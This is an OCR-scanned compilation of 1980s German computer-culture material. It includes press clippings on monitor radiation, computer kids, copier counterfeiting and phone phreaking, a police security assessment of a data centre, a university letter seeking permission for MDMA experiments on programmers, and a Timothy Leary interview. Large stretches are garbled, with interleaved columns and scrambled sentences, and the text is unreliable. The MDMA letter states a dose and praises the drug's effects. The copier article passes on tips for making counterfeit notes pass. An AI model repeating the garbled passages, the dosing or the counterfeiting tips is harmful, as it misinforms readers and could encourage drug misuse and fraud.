sen, mit folgenden Inhalten: AlsBildschirmarbeitspltze im Sinne der Vorschrift sollen die gelten, an denen jemand am Terminal sitzt und sei es auch nur eine halbe Stunde am Tag. Bisher galt die Definition nur fr berwiegende" Ttigkeit am Computerein beliebtes Schlupfloch fr die Arbeitgeber. Herabsetzung der Grenzwerte und Zuschnitt auf die Situation an den Monitoren. Ziel: auch Langzeitschden sollen vermieden werden. Die Hersteller sollen dazu gezwungen werden, jede Art von Strahlenbelastung zu minimieren, also Ummantelungen und Filter schon im Werk einbauen. Schwangere sollen aufWunsch einen anderen Arbeitsplatz bekommen. Software soll m g l i c h e benut1) Das Boikat-Gutachtcn ist in populrwissenschaftlicher Form nachzulesen in der JuniAusgabe des P.M.Computerhefts. Bestellung perEinzahlung von D M 7,50 auf Konlo N r . 71 15-203 Postgiro Hamburg. 2) Informationsstelle Ingeborg May-Sleinhausen. Briikkcnslr. 50. 6000 Frankfun 70, Tel.: 069/61 47 07. Ein Fragebogen wird gerne an Betroffene verschickt.

Die

Berufsgenossenschaften

si nd partittisch mit Arbeitgebern und Gewerkschaften besetzt. Sabine Kaiser wirdalso M h e h a b e n ihre Forderungen durchzusetzen! Betroffene, die sich im B e t r i e b engagieren, haben dennoch g a n z gute Chancen, sich selbst zu helfen. Ein Mitglied der Selbsthilfegruppe erkmpfte sich einen bildschirmfreien Arbeitsplatz mit U n tersttzung des Werksarztes. E r bat mich, keinem zu erzhlen, d a diese Strungen von der Arbeit a m Bildschirm k o m m e n " , gab er z u Protokoll. Und Ingeborg M a y Steinhausen wei, da zehn weitere Kolleginnen nach ihr k n d i g ten. D e m Chef war das eine W a r nung; er versprach Verbesserungen.

Bleiben noch die Gewerkschaften. Sind sie zu arm, um eigene experimentelle Studien in Auftrag zu geben? Oder liegt ihr mangelndes Engagement darin begrndet, da vor Bildschirmen meist Frauen sitzen? Whrend Frauen oft acht Stunden tglich auf den Monitor starren mssen, haben Mnner meist Mischarbeitspltze. Sabine Kaiser, zustndig beim DGBBundesvorstand, findet, da die Gewerkschaften sehr wohl aktiv sind in diesem Punkt aber man verfge halt ber so wenig abgesicherte Erkenntnisse.., Ihr nchster wichtiger Termin ineinerPolitikderkleinenSchritte ist die Herbstsitzung eines berufsgenossenschaftlichen Fachausschusses, der u.a. Regelwerke zur Vorbeugung gegen Unflle und Berufskrankheiten erarbeitet. Fr Bildschirmarbeitspltze gibt es bisher nur sogenannte Sicherheitsregeln", die keine Gesetzeskraft haben. Ansonsten gelten die Vorschriften fr den Strahlenschutz. Der D G B mchte eine rechtsverbindliche Unfallverhtungsvorschrift" erstellt wis-

schirmfillem her (vom hillign Nylon-Filler gegen Flimmern bis zu Metallfiltcrn filr militrische Zwecke). Sie . ein deutsche Hersteller fr Carbonfilter gegen elektromagnetische Strahlung. Tel.: 089/59 61 34/5, Bayerstr. 2, 8000 Mnchen 2 5) Auch Alu-oderKupferfolie hilft Strahlung verringern. Es bestehtaberdieGcfahrderberhitzung des Computers bei unsachgemer Monlage. 6) Computer der Firma M c mcircx sind angeblich mit Filter und Erdungsstelle ab Werk lieferbar. DieskandinavischeFima Nokia stellt streuslrahlungsarme Bildschirme her. 7) Die Sichcrhcitsregeln fr Bildschirmarbeitspltze" mten sich beim Persona!-/Bctriebsrat finden. Gegen eine geringe Gebhr verschickt sie die Verwaltung!-Be rufsgenossenscltart, Postfach 60 2B 60 2000 Hamburg 60

Obiger

Artikel

erschien
der

am 30. Juli "tageszeitung". rin hat

1987 ,>, Die

Autoein ge-

inzwischen

Buch ber das Thema schrieben. Es

3) Die Stellungnahme der Deutschen Gesellschaft fr Arbeitsmedizin e.V. erscheint in d e r N r . 7 der Zeitschrift fr Arbeitsmedizin. Sozialmedirin, Prventivmedizin. Der Betriebsarzt. Center Verlag, Stuttgart. 4) Die Firma Logo Computer" stell! alle Arten von Bild-

erschein, imj dem


a n u a r

wahrscheinlich 1989 unter

Titel

"Krank durch Computer'


Die neue
U n d

Volkskmnkheit

""" Sie dagegen tun knnen" im Rowohlt Ver-

Mit freundlicher Genehmigung der "taz" entnommen

Computerkids ganz normal"


Computerkids sind .ganz normale Jugendliche und keine vereinsamten Sonderlinge". Das ist das Ergebnis einer Umfrage der Computerzeltschriften CHIP und HC. Von 3000 Befragten konnte fast jeder zweite (46 Prozent) durch sein Computer-Hobby sogar neue Freunde dazugewinnen, Gerade sechs Prozent haben Freundschaften zugunsten neuer aufgegeben, nur bei drei Prozent wurde der Freundeskreis kleiner. Auch die Beziehungen zum anderen Geschlecht leiden kaum unter der Bildschirm-Begeisterung. Von gemeinsamer Interessenlage kann allerdings weniger die Rede sein: Neun Prozent der jeweiligen Partner/Innen lehnten den Computer, entschieden ab. fast die Hlfte der Freunde/Freundinnen von Computerfreaks stehen dem Hobby des Partners/der Partnerin eher gleichgltig gegenber. Gerade acht Prozent sind ebenfalls vom PartnerHobby begeistert. Das restliche Viertel ist .eher positiv" eingestellt. Die Beschftigung mit dem Computer wird von den Jugendlichen nicht nur als Freizeitsport betlieben. Die groe Mehrheit der Befragten (82 Prozent) erwarten sich auch schulische Vorteile davon. Jeder Vierte (28 Prozent) rechnet mit besseren Berufschancen. Von den CHIP/HC-Fragebgen wurden gerade vier Prozent von Mdchen oder jungen Frauen zurckgeschickt. Quelle: ddp Aprll/86

Super-Kopierer produziert tuschend echt Blten / Polizei ist hilflos


Frankfurt - Der W u n s c h t r a u m der farbigen Kopie g e h t In E r f l l u n g . " S o w i r b t d e r j a p a n i s c h e K o n z e r n C a n o n fr e i n e n n e u e n F a r b k o p i e r e r , d e r n i c h t n u r d e n Kopierermarkt, s o n d e r n auch die Unterwelt revolutionieren knnte. D e n n Color Laser" kopiert e i n f a c h alles tuschend echt. Besonders gut Geldscheine, Ausw e l s e u n d G e s c h f t s b r i e f e . D i e P o l i z e i ist hilflos. In Spanien und den U S A sind bereits kopierte Blten" und Schecks aufgetaucht. Hierzulande schlagen die Fahnder Alarm, ehe der Kopierer ab Herbst verkauft wird. Ein Polizist: Da k o m m t sogar das Wasserzeichen durch." Die Bundesbank wiegelt ab: Wir sind sicher, da keine Blten hergestellt werden knnen, die nicht erkennbar sind." Das stimmt. Fr Experten. Aber nicht fr den kleinen M a n n auf der Strae, meint ein Fahnder, der anonym bleiben will: Da nimmt m a n normales 70Gramm-Papier. Das knistert genauso schn. D a n n kann man den Schein in jeder Farbschattierung einschweien." Er zeigt auch einen nagelneuen, angeblich flschungssicheren Personalausweis geflscht. Man kann auch eine Kopie einschweien", meint er resigniert.

Ein (Alp-)Traum wird wahr: Geld aus dem Kopierer


Canon fhlt sich nicht fr etwaigen Mibrauch mit dem Super-Kopierer verantwortlich. Ein Manager: Jeder Kunde mu selbst fr den legalen Umgang sorgen," Dennoch wird ber Sicherungen nachgedacht. Etwa eine Sperre, die nur mit einer Kennkarte berwunden wird. Nur: Auch diese Karten kann Color Laser" kopieren.

Telefone senden4' auch


B O N N , 29. D e z e m b e r (dpa). D a s Bund e s p o s t m i n i s t e r i u m htft e i n g e r u m t , d a m i t G e b h r e n z h l e r n ausgerstete Telefone wie kleine R u n d f u n k s e n d e r funktionieren u n d a b g e h r t w e r d e n k n n t e n . E i n Sprecher versicherte a m M o n t a g , dies sei aber n a h e z u belanglos, d a die Sendeleistung" n u r 20 bis 30 Z e n t i m e t e r betrage. E i n e R c k r u f a k t i o n der Apparate, wie in der Presse gemeldet, sei n i c h t beabsichtigt. I n einer R e g i o n a l s e n d u n g des W D R F e r n s e h e n s w a r vor k u r z e m berichtet worden, G e s p r c h e b e r r u n d 1,3 Million e n m i t integrierten G e b h r e n z h l e r n ausgerstete Telefone k n n t e n auch aus einiger E n t f e r n u n g " auf Mittelund L a n g w e l l e a u f unterschiedlichen Frequenzen e m p f a n werden.

Hacker telefonierten zum Null-Tarif


B e a v e r D a m . (rtr) Sechs jugendlic h e " H a c k e r " i n B e a v e r D a m i m USBundesstaat Wisconsin haben ber e i n J a h r l a n g ausgiebig telefoniert, ohn e e i n e n P f e n n i g G e b h r e n zu z a h l e n . W i e d i e Polizei mitteilte, h a b e n sich d i e zwischen 13 u n d 17 J a h r e a l t e n Teenager ber ihren Computer Numm e r n v o n K r e d i t k a r t e n u n d Telefoncodes besorgt u n d d a n n r u n d 2000 Telefonate fr umgerechnet knapp 80 000 M a r k gefhrt. H h e p u n k t d e r heimlichen Hackeraktivitten war e i n e z w l f S t u n d e n d a u e r n d e Konferenzschaltung m i t Teilnehmern in N e w Y o r k u n d M a r y l a n d , a n der insg e s a m t 22 P e r s o n e n beteiligt w a r e n .

US-Kids: eher lustlos


Kinder zwischen acht und dreizehn Jahren haben, zumindest in den USA, kein besonders enges Verhltnis zum Computer. Sie meiden den Bildschirm in Ihrer Freizeit und halten Abstand zu d e n . computerbesessenen Altersgenossen. Zu diesen Ergebnissen kommt eine Studie der University of California. Resmee: .Die' vermutete Entwicklung zu Computerkindern hat nicht stattgefunden.' Gerade die Hlfte der befragten Dreizehnjhrigen etwa weiB, wie ein Computer funktioniert. Und dies, obwohl ihre Schule entsprechende Kurse anbietet Nicht einmal jeder dritte von ihnen will als Erwachsener etwas mit Computern zu tun haben. Quelle: SPIEGEL 44/85

Hacker freigesprochen
L o n d o n , (dpa) D a s britische O b e r h a u s als oberste B e r u f u n g s i n s t a n z h a t zwei sog e n a n n t e H a c k e r , d i e sich Z u g a n g z u d e m Computer-Informationssystem Prestel" verschafft h a t t e n , freigesprochen. N a c h A n s i c h t der Lords stellte d a s A n z a p f e n der Datenbank keinen kriminellen A k t d a r . D e n beiden A n g e k l a g t e n sei es n i c h t u m G e l d g e w i n n , s o n d e r n u m d i e Demonstration ihrer F h i g k e i t e n , als H a c k e r gegangen, meinten die Lord-Richter.

2.2.M- 8g

Sicherungsobjekt: Rechenzentrum des Deutschen und Klinikrechenzentrum JOllBforschungszentrums

LANDESKRIMINALAMT

B A D E N - W R T T E M BE RG

sowie der geplante rumliche Aufbau fr das Universitt OWW^IIilimjrt^

Besprechung und Ortsbesichtigung: Arn 27.02. 1985 fand eine allgemeine Besprechung und Orts besichtigung statt. Vorbemerkungen: Die nachfolgend empfhle nen Sicherungsmanahmen werden als geeignet angesehen, die mechanischen Widerstandsund Widerstandszeitwerte an den als Schwachstellen erkannten Bauteilen ces zu sichernden Objektes zu erhhen Es soll dadurch ein einheitliches sicherungstechnisches Niveau des gesamten Objektes erreicht werden. Die Empfehlungen gehen von der Zielvorstellung aus - unter Bercksichtigung der angetroffenen rtlichen Voraussetzungen-, ein rechtswidriges Eindringen bzw. Einbringen von Gegenstnden in das Objekt wesentlich zu erschweren und den Schaden bei einem Anschlag mit Sprengstoff mit vertretbaren Mitteln so gering wie mglich zu halten. Ein Anspruch auf Vollstndigkeit - unter dem Gesichtspunkt einer absoluten Schutzwirkung - kann nicht vorausgesetzt werden. Die Sicherungsempfehlungen verfolgen das Ziel, die Datenverarbeitungsanlage als gesicherte "Insel" innerhalb des Gebudes auszubilden. Baurechtliche und brandschutztechnische nicht bercksichtigt werden. Vorschriften

Sachverstandige usserung des


Landeskriminalamtes Baden-Wrttemberg

Fachgebiet:

Kriminalpolizei liehe FachborIch

Pr&ventior.

ElcherungatechnIV

Slcherungsobjekt(e)

RechenZentrum Deutsches HBforscr.ungszentrum und Universittsrechenzentrum


Beratung ber die baulichtechnischen Sicheruncs.nanahmen

Aufgabenstellungen) :

OSl Dezernat 202 - Zentralstelle fr Sicherungstechnik und Beratung OSl 202 - 2912.7 - 78/85 - 154/85 SB I KHK M M M R

knnen im Rahmen der weiteren Sachverstndigen uerung Anlg.i 3 Blatt

C ^ M r ,

r . u U - U . m . . > f.m.,....

107 II] 0*0-1 " M . 7 I " >

rtliche und bauliche

Gegebenheiten: Fr den rumlichen Aufbau des Universitts- und Klinikrechenzentrums im Erdgescho des Gebudes sollte angestrebt werden, an der Auenfassade eine Pufferzone mit Brorumen zu errichten. Der im Plan eingezeichnete Maschinenraum sollte als gesicherte "Insel" mit einer Stahlbetonwand werden. Bezglich des Aufbaus eines Zugangskontrollsystems sicherungstechnischen mit Schleusenfunktion gelten die fr das Rechenzentrum im 1. Untergescho ausgefhrten Empfehlungen. Sprengstoffanscnlag Schlubemerkung: Die vorstehend aufgefhrten Manahmen sind nach hiesiger Auffassung Mindestforderungen, u r den i. zu erfllen. Weitergehende Manahmen zur Optimierung, aus sicherungstechnischer Sicht lassen sich aufgrund der rtlichen und baulichen Voraussetzungen unter dem Gesichtspunkt der Verhltnismigkeit kauir. realisieren. Sollten fr die Sicherung des Rechenzentrums umfangreiche bauliche Manahmen geplant werden, steht Ihnen das Landeskriminalamt Baden-Wrttemberg fr weitere detaillierte Ausknfte und entsprechende Beratungen gern zur Verfgung. sicherungstechRechenzentrum nischen Grundschutz fr den Gesar.tbereich umfat

Das Rechenzentrum als zu sichernder Bereich befindet sich im 1. Untergescho des Gebudes. Im Oberteil der Auenwnde sind durchgehend Fenster angebracht, welche ebenerdig zum Gelnde abschlieen. Die Frischluftansaugung erfolgt ebenerdig an der sdlichen Fassadenseite. Im Erdgescho des Gebudes ber dem jetzigen Rechnerraum soll zuknftig das Rechenzentrum der Universitt MMMMNMMf installiert werden.

Sicherungstechnische Empfehlungen : Um einen effektiven Schutz vor einem

aufzubauen, sollten die sensitiven Gerte ces Rechenzentrums in einem gesicherter. Raum mit Stahlbetonwncen in einer Strke von mindestens 20 era untergebracht werden, wobei nur eine Tr in entsprechender Ausfhrung aus ce~. gesicherten Vorfeld in den Systemraum fhren sollte. Sollte der gesamte Maschiner.raum als gesicherter Raurr. ausgelegt werden, sind folgende Manahmen - verschlieen der Fensterffnungen durch - Aufbau eines effektiven notwendig: Betonplatcen, ,

Zunangskontrollsystems,

- Zugang zum Rechnerraum seilte nur ber eine Schleuse mglich sein.

In die mechanischen Sicherungsmanahmen sollte auch die Klimazentrale mit einbezogen werden. Die Frischluftzufhrung sollte mit einem Kamin oder Schacht an der Auenfassade hochgefhrt werden, um das Einbringen von Flssigkeiten oder Gasen wesentlich zu erschweren. Als Alternative zum Verschlu der Fensterffnungen kann

innerhalb des Maschinenraumes ein gesicherter Raum nach o.a. Kriterien aufgebaut werden, wobei die Vorhandenen Fenster m i t einbruchhemmencen Glsern nach DIN 52 290 b e s t c k t werden sollten.
3 -

Kriminalhauptkommissar

Techn. Oberinspektor z.A.

Stuttgart, den 09.04.1985

UNIVERSITT D E R B U N D E S W E H R
F a k u l t t fr I n f o r m a t i k I n s t i t u t fr S y s t e m o r i e n t i e r t e I n f o r m a t i k

MNCHEN

Professor D r . P . M o l z b e r g e r P r o g r a m m s y s t e m e fr A n w e n d u n g e n U . i r , i . i . der Bundev,ehr-Werne r-Heicnberg-Weg 39- D-80 14 Neubiberg

An das Bundesgesundheitsamt Bundesopium-Steile Postfach 3 3 0 0 1 3


mit denen wir auch bisher mit S o f t w a r e - E n t w i c k l e r n haben. Dabei sind quantitative experivor-

lOOO B e r l i n
Betr.; Antrag auf

33
Sondererlaubnis Zwecke fr Droge MDMA fr

mentiert

Messungen

zunehmen. Es geht hier um: wissenschaftliche

1. d e n

Thadhani-Effekt lt. NliP - N e u r o - L i n g u i s t i c Programming.

2. P r o z e s s e Sehr g e e h r t e Damen und im Rahmen Herren, HAIST h a b e n w i r mit MDMA

1.

Thadhani-Effekt Unter diesem Namen ist der Effekt b e k a n n t g e w o r d e n , manche Programmierer in einen Zustand extrem da hoher wenn

des Forschungsprojekts

experimentiert.

Da die Droge nach dem

Betubungsmittelgesetz bitten wir um eine

Konzentration die sinkt

und L e i s t u n g s f h i g k e i t

hineinkommen, eine

seit A u g u s t 1986 nicht mehr erlaubt Sondergenehmigung,

ist,

A n t w o r t z e i t des C o m p u t e r s u n t e r c a . (siehe Abbildung) .

Sekunde Alphawel-

um die Experimente

fortzusetzen.

Dabei t r e t e n im EEG

len auf. Zum P r o j e k t HAI ST H A I S T steht handelt fr Human Abilities in S o f t w a r e - T e c h n o l o g i e . Forschungsprojekt von der Es aus sich um ein interdisziplinres und Psychologie, das auch

Quantitative Leistung und Q u a l i t t an. Der Zustand w i r d erlebt. als

der

Arbeit

s t e i g e n sprunghaft und w n s c h e n s w e r t

entspannend

(Ahnliche Effekte kann man bei K i n d e r n b e o b a c h t e n , sich v o l l auf ein V i d e o s p i e l konzentrieren). in e i n e n ber

die

Informatik untersttzt

Industrie

wird.

International

arbeiten wir

insbesondere Ein Fr-

Spitzenprogrammierer lichen Computer Zustand

sind in der L a g e ,

hnden

mit kanadischen und U S - W i s s e n s c h a f t l e r n derantrag mit einem an die Deutsche Kollegen

zusammen.

auch ohne

Biofeedback-Loop

Forschungsgemeinschaft, unserer

zusammen fr

hineinzugehen.

(Psychologe an gestellt.

Fakultt

Pdagogik) wird derzeit

In H A I S T geht es um die Erschlieung von ven von Software-Entwicklern.

Kreativittsreserentneh-

Eines

unserer

Zwischenziele

wre,

es

auch

anderen Umstnden zu

Einen kurzen b e r b l i c k aus dem

P r o g r a m m i e r e r n - auch unter w e n i g e r g n s t i g e n zu e r m g l i c h e n , ten. Wir wissen, da gezielt da das in diesem Zustand ist,

men Sie bitte dem beigefgten Ausschnitt bericht

Forschungs-

arbeiwir

1985 der Universitt der B u n d e s w e h r z.B. die

Mnchen,

erlernbar

und

'eitere Information ber HAIST,

Verffentlichungen, 2.

vermuten,

dieser L e r n p r o z e u n t e r M D M A kann. Prozessen nur v e r w e n d e n w i r Bereich

erheblich

;teilen wir Ihnen gern auf Wunsch zur

Verfgung.

beschleunigt

werden

irh.it m i t N L P - h n l i c h e n Das Ziel ist das gleiche,

:u den bisherigen :ie

Experimenten mit

MDMA Arzt und und

Methoden, entwickelt
o d e r

Versuche wurden uerst s o r g f l t i g von einem therapeutisch geschulten wobei

die u r s p r n g l i c h wurden:

im t h e r a p e u t i s c h e n

ehreren begleitet,

Personen v o r b e r e i t e t

Bei uns wurde das sog. entwickelt, da

SUPERPROGRAMMERauf einer

die Gruppe in einer g e s c h t z t e n Sie d i e n t e n dem und die Zweck,

Umgebung zunchst

MASTERY-Model

Synsthesie und

zwei Tage beisammenblieb. einmal das

(Sinnesberschneidung) des v i s u e l l e n , des kinsthetischen

des a u d i t i v e n basiert) .

Mittel kennenzulernen zu erkunden.

grundstzlichen

Reprsentations-System " T h e r a p i e in

Siehe G r i n d e r / B a n d l e r : Hier die

Trance". Bereich, dem da Ein-

Mglichkeiten

wir

haben festgestellt,

da unter g e r i n g e n Dosen

(150

eine Phase extrem hoher g e i s t i g e r K l a r h e i t Klarheit Einflusses bis ca. bleibt teilweise auch noch

auftritt. Abklingen nach ^

mg) Diese des ^

w i s s e n wir aus dem t h e r a p e u t i s c h e n bertragung

darartiger F h i g k e i t e n u n t e r abluft.

flu von M D M A sehr viel e f f i z i e n t e r ziel unserer B e m h u n g e n ist . Ronzentrationszustnde

der Droge (ca. 5 Stunden) erhalten, in G e f - h l ,, j v , na<! u e r t e sich in einem eine Woche d a n a c h . < n o i t e i a e r t e r K o n t a k t f r e u d i g k e i t und tiefer innerer Harmonie, J e 3 L " erheblich g e s t e i g e r t e r f-reauj-vj. E der K l a r h e i t sind w i r A u s s c h l i e l i c h an d i e s e r Pnas sie fr ur.se re A r b e i t zu n u t z e n . essiert,
-or Kreativitt und Leistungsfhigkeit.

der P r o g r a m m i e r e r , wiederum sind

der

derarVon
'

integriert. m der

untersuchte

Spitzenprogrammierer

Laae

mter

augenblicklich a

von ihrer Arbeit u m z u s c h a l t e n , konzentrieren.

um s i c h

rast

im uns =

persnliches Gesprch zu

, n Z.D

Vorc[esehene_Arbeiten p h a s e d e r t . ird darin bestehen, Der nchste Schritt wir s s e zu nutzen, r U n t e r s t t z u n g der g l e i c h e P r o z e s s Klarheit zu Antrag wurde letztendlich Diese r

w i r

bitten, uns mitzuteilen, unter welchen B e d i n g u n g e n c i e _ , ^ bereit waren, uns eine A u s n a h m e g e n e h m i g u n g 2 U e r t e i l e n en. wegen Erfolglosigkeit nicht gestellt,

aber..

UNTERSUCHUNGEN AN SPITZENPROGRAMMIERERN UND SPITZENTEAMS (HAIST) HUMAN ABILITIES IN SOFTWARE TECHNOLOGY Beteiligte Mitarbeiter: Dipl.-Ing. Georg V. Zeraanek
L a u f z e i t: Pro^ektfrderung: Zusammenarbeit mi

ab Oktober 1*84 Siemens AG

FAKULTT FR INFORMATIK Institut fr Systemorientierte Informatik Prof Professur fr Programmiersysteme fr Anwendungen Prof. Dr.-Ing. Peter MOLZBERGER

Siemens AG, Mnchen Human Technologies GmbH, Mnchen Institut fr Organisationsberatung und (IOT), Mnchen TEKNICCM Ottawa, Kanada

Technoloaie-Anwenduna

Im Projekt HAIST gehen wir davon aus, da unsere Grenzen in der Fhigkeit, groe Software-Systeme zu entwickeln, heute nicht mehr primr durch technologische sondern durch menschliche/zwischenmenschliche Faktoren bestimmt werden..D.h. es ist ein fhlbarer Fortschritt auf diesem Gebiet heute nur noch erzielbar, wenn psychologische und soziotechnische Aspekte weit mehr als bisher in den Brennpunkt rcken. Ausgehend von "Superprogramming Effekt", der Tatsache, da einige Softwareleute, in ihrer Leistungsfhigkeit, sowohl quantitativ wie qualitativ, um eine Grenordnung ber dem Durchschnitt liegen, werden Untersuchungen ber die Arbeit des Software-Entwicklers, insbesondere ber die Natur des kreativen Prozesses, durchgefhrt. Wir arbeiten beispielsweise mit :1L? (Neurolinguistic Programming) , um exzellentes Verhalten von Individuen zu analysieren, modellhaft zu erfassen und auf andere Individuen zu 'bertragen. Theoretische Ergebnisse werden im Rahmen der Superprogramming-Seminare unter Marktbedingungen erprobt. Verffentlichungen : - Molzberger, P.: Software-Entwicklung fr Fhrungssysteme - eine Herausforderung an das Bewutsein der Bundeswehr. In: Hofmann, H.W., Huber, R.K., Molzberger, P. (Hrsg.): Fhrungs- und Informationssysteme. Oldenbourg, Mnchen 1932 - Moltberger, P.: Und Programmieren ist doch eine Kunst. In: H. Schelle und P. Molzberger (Hrsg.): Psychologische Aspekte der Software Entwicklung. Oldenbourg, Mnchen 1983 - Molzberger, ?.-. Aesthetics and Programming. In Proc. CHI '83 Human Factors in Computing Systems (Boston, December 12-15, 1933), ACM, New York 1983 - Zemanek, G.V.: Psychologische Ursachen von Programmierfehlern. In: Psychologie des Programmierens. Schauer, H. und M. Tauber (Hrsg.). Schriftenreihe OCG, Band 20. Oldenbourg, Wien-Mnchen 1933 - Molzberger, P.: Transcending the Basic Paradigm of Software Engineering, Be-

Auf der Ebene der Teams experimentieren wir mit 1 synergetic Croups', d.h. Teams, die hinsichtlich Leistung, Qualitt und persnlicher Zufriedenheit um einen deutlichen Faktor ber dem Durchschnitt liegen. Hier besteht ein enger Informationsaustausch zu G. Weinberg, Lincoln/ Nebraska, der in seinem Buch "Psychology of Programming" 1971 erstmals ber derartige Effekte unter dem Titel "egcless" programming" berichtete. Ein weiterer Schwerounkt der Arbeiten sind Procrammierfehler und die Aufdeckung der psychologischen Faktoren, die zu diesen "Fehlleistungen" fhren. In Zusammenarbeit und unter finanzieller Frderung durch die Siemens AG arbeiten wir an der Gestaltung von Software-Tools, die die Forschungsergebnisse bercksichtigen und insbesondere geeignet sind, den kreativen Proze anzuregen. Im Herbst 1983 wurde im Vorfeld dieses Projektes ein zweitgiger Workshop "Programmieren mit der rechten Hirnhlfte" ausgerichtet.

rieht Nr. 3405, Fachbereich Informatik, Hochschule der Bundeswehr Mnchen ;


r

- Molzberger, ?.: Der Computer als KommunikationsDartner. In: Psychologie^der Computerbenutzung. Schauer, Ei. und M.J. Tauber (Hrsg.). Schriftenreihe OCG, 3and 22. Oldenbourg, Wien-i984 - Zemanek, Z.V.-. Schnittstellenentwurf am Beisoiel einer AufZugssimulation. In: Psychologie der Computerbenutzung. H. Schauer und M.J. Tauber (Hrsg.). Schriftenreihe OCG, Band 22. Oldenbourg, WlenMnchen 19 34 - Molzberger, ?.: Can we Teach Consciously Excellent Programming? Proc. WCCE 85 (World Conf. on Computers in Education), N o r f o l k / V i r g i n i a , August 1985 - Zemanek, G.V.: A F o r m a l Tool for Checking P r o g r a m Thinking. In: Formal models in p r o g r a m m i n g , E. Neuhold, G. Chroust (Hrsg.) , North Holland 1935, S. 137 - 142.

TIMOTHY LEARY
This generation of baby boomers 76 miMon strong. They can do whatever they want.

, S THE former ^ _ jo-M/M LSD guru, what do you thmk cf Nancy Reagan's advice on drup - Just say no"? , Our kids should be better mannered than that! We should tell them, "Just say, 'No, thank you.' " Any blanket "Just say no" S a negative approach to [ife, which is typical of the Reagan administration. So you disagree wuh the huge antidrug campaign? I'm totally opposed to nonadults using any drug. However

the use of drugs by kids should be easily handled in a family in which there is trust and communication. The fact that kids in the ghetto use drugs ts
viewed the w r o n g way. T h e

problem . not die dmgs; the p r o ^ families where there are no models, mc
* ^ ^

^ r t h e n e

Ad*

posed to make their own ^ a b o u ters. I am consntuuonally opposed. t o g ^


humons ^ a m s t my using any d n ^ ^

pos, a different problem, They are


S e . I f you l o

freak, intervene. ^ ^ Z ^ j T o money or guns W ^ ^

K i S - S S
x

psychedelic drugs, because we had to use the mystical language of the past - Hindu terms like ' satori and samhadi, occult terms like iihrnmahon and transcendental W e didn't have the scientific metaphors to understand what we were discovering. AnA ve do now? Yup. We had to have a personal-computer movement to help us understand the brain. You see, we can only understand our inner workings in terms o f die external, mechanical or technological models that we build. W e never understood the circulation of the blood until we had hydraulic systems moving water around. We didn't understand metabolism until we had masP H O T O G R A P H BY W I L L I A M C O U P O N tered thermodynamics with the steam engine and understood how coal and oil produce danzerous machinery or who run nuclear plants. I don't power and energy. Only then could we figure out how ^ the pilot of my plane hallucinating. But intelligent carbohydrates and proteins work. Coming from an inghetto mdwduak are not going to work for companies that dustrial, mechanical culture, how could we possibly unw " c e them to do demeaning dungs l i e pee in a , derstand the brain? Until recendy we thought die brain bottle God knows what they would want.next was a machine like a big telephone system. This is a ^ n retrospect, what * <*** W ^ completely inadequate metaphor. The psychedelicdrug movement of the Sixties and the personal-coma strong taboo discouraging experimentaputer movement of the Eighties are inner and outer ^ I h die hum'n brain. Before the Renaissance, reflections of each other. You simply cannot under^ ^ ^ T , a strong religious taboo aga^t Ascovenng stand psychedelic drugs, which activate the brain, there was a strong tragi ss m ^ s|ck unless you understand something about computers. how the b o d y worked 1 his hem v It is no accident that many of the people in the commedicine and learn how or b o puter movement had experimented with L S D . ^ doing at Haracnng irrethe bram works. Thats what <*e edelic And what was learned? and do use Every person who took acid has his or her own stoand Miilbrook e n ^ N o n e of ry to telL That's the beautiful thing about it Certainly r r X ^ r ^ ^ n r n g w h e n w e took

TIMOTHY LEARY

there is no one who had an experience with LSD who Abbie Hoffman is a wonderful legend. The most ney general, John Mitchell; Haldeman and Ehrlichdidn't have an unforgettable, overwhelming experience. radical, eloquent, rabble-rousing agitator of our time. man; Gordon Liddy. Now, in the Eighties, how can How do computers help our inner exploration? JenyRitbm? you avoid the computer revolution? Computers help us understand how our brains procJerry's your basic Y M H A director, a likable young Can you describe your work in the computer field? ess information. For example, as a psychologist, I was executive. Jerry is a liberal conformist He could just as My work involves cybernetic psychology - the pertaught that the synapse, where two nerve ending exwell have been a young liberal Republican. He's cersonalization and popularization of quantum mechanics. change information, was a sort of on-off switching detainly not your new Aristode or Plato. Packaging and communicating thoughts at light vice. That is not true at alL At the synapse there are What was his role then? speeds. Putting electronic appliances in the hands of inmillions of quantum signals, like an enormous television H e had his own Holy Grail quest He certainly was dividuals. First we had the telephone, then radio, screen. There is probably more complex information out there in the front lines. And he has a certain organmovies, television. Now we have computers, video exchanged between one synapse and another than in izational charm, which I admire. I f you're looking for a players, compact discs, home-editing appliances. It's most computer programs. But I have to have an underueterans-of-the-Sixties consensus here, I'd guess that still just the beginning. In the next five years we're standing of computers to be able to say that. There is a ninety percent of the people who were involved in the gonna design you an inexpensive electronic facility wonderful paradox here: we can only navigate outside psychedelic brain-discovery movement would tell you for your living room. You'll be able to move inforas well as we can navigate within. What happened in that LSD paved the way for most of the cultural events mation and images around on your screen in whatevthe Sixties was that we did a lot of inner tripping, but of the last two decades ecology, New Age, Shirley er way you want Now, that's revolutionary. we lacked the cybernetic-lanhi what ways? guage technology to express In the twenty-first century, and map and chart what we whoever controls the screen conwere experiencing. trols consciousness, information Do you miss the Sixties? and thought. The screen is a Not really, though 1 must say mirror of your mind, get it? If SD paved the way for mast it was a fantastic age of explorayou are passively watching tion We had that old-time 1492 screens, you are being proColumbus fever. We sensed that of the cultural event) of the ladt two decoded -ecology, thefitn&M grammed. I f you are editing your we were brain explorers. We inown screen, you are in control of tuitively used metaphors of travel jrour mind. George Orwell had it craze, the peace movement, Shirley MacLaine.. - "tripping," "coming down," wrong. H e was too optimistic. "head pilots," "guiding voyagH e wrote in 1984 that Big ers." The metaphor "turning on" Brother would watch us from relates to activating the television screens on the walls of our living set and booting up the computer. rooms or bedrooms. But that is These days, the drugs in vogue nothing. You could always duck are not mind expanding. What does that say about the time? MacLaine, the bom-again personal-religion stuff, the out of sight. The current horror is that Americans The drugs that are popular today cocaine, pills, peace movement, the personaffitness craze, pop art, voluntarily stick their amoeboid faces toward the ecstasy, Venus, Eve tend to alter mood rather than personal-computer hacking, MTV, Blade Riamer, Sat- screen six or seven hours a day and suck up informaexpand consciousness. They can be instructive and urday Night Live and the cybernetic Eighties. tion that Big Brother is putting there. Here is the fun if handled prudendy. But we still have to learn Cybernetic? key to our future: We can and will control our own how to communicate what we experience. Let's be I think each decade in the roaring twentieth century screens. We are designing software that will empowfrank: there will be new, improved drugs and waves has produced new technologies and art forms for perer you to produce and direct your own mind movies, of internal explorations. sonalizing and popularizing electronic, light-speed your own prime-time shows. With ahat end? quantum energies. Since 1900 our society of factory And how will it affect us? It is a genetic imperative to explore the brain. Why? workers and farmers has been transformed into an inThis will create a new model of human being, 